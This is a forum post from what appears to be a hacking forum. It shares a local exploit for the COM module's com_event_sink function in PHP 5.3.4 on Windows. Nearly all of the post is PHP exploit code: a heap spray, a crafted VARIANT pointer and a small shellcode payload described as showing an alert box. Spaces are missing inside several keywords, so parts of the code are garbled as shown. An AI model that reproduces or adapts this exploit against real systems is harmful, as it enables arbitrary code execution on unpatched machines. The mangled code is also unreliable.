[Local Exploit]PHP 5.3.4 Win Com Module Com_sink Exploit 10-23-2012, 01:11 PM
#1
PHP 5.3.4 Win Com Module Com_sink
Exploit
Exploit
PHP Code:
#ExploitTitle:PHP5.3.4WinCom
ModuleCom_sinkLocalExploit
#GoogleDork:Nil
#Date:9/10/2012
#Author:FB1H2S
#SoftwareLink:PHPWindows
#Version:[5.3.4]
#Testedon:MicrosoftXPPro2002SP2
<?php
//PHP5.3.4
//
//$eip="\x44\x43\x42\x41";
$eip="\x4b\xe8\x57\x78";
$eax="\x80\x01\x8d\x04";
$deodrant="";
$axespray=str_repeat($eip.
$eax,0x80);
//048d0190
echostrlen($axespray);
echo "PHP5.3.4WINComModule
COM_SINK0-day\n";
echo "ByRahulSasi:http://
twitter.com/fb1h2s\n";
echo "ExploitTestedon:\nMicrosoft
XPPro2002SP2\n";
echo "MoreDetailsHere:\nhttp://
www.garage4hackers.com/blogs/8/web-
app-remote-code-execution-via-
scripting-engines-part-1-local-
exploits-php-0-day-394/\n";
//19200==4B324b00
for($axeeffect=0;$axeeffect<0x4B32;
$axeeffect++)
{
$deodrant.=$axespray;
}
$terminate="T";
$u[]=$deodrant;
$r[]=$deodrant.$terminate;
$a[]=$deodrant.$terminate;
$s[]=$deodrant.$terminate;
//$vVar=newVARIANT(0x048d0038+
$offset);//Thisiswhatwecontroll
$vVar=newVARIANT
(0x048d0000+180);
//alertboxShellcode
$buffer="\x90\x90\x90".
"\xB9\x38\xDD\x82\x7C
\x33\xC0\xBB".
"\xD8\x0A\x86\x7C
\x51\x50\xFF\xd3";
$var2=newVARIANT(0x41414242);
com_event_sink($vVar,$var2,$buffer);
? >
![[Image: deceptionorangeoverlay.png]](http://img7.imageshack.us/img7/812/deceptionorangeoverlay.png)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)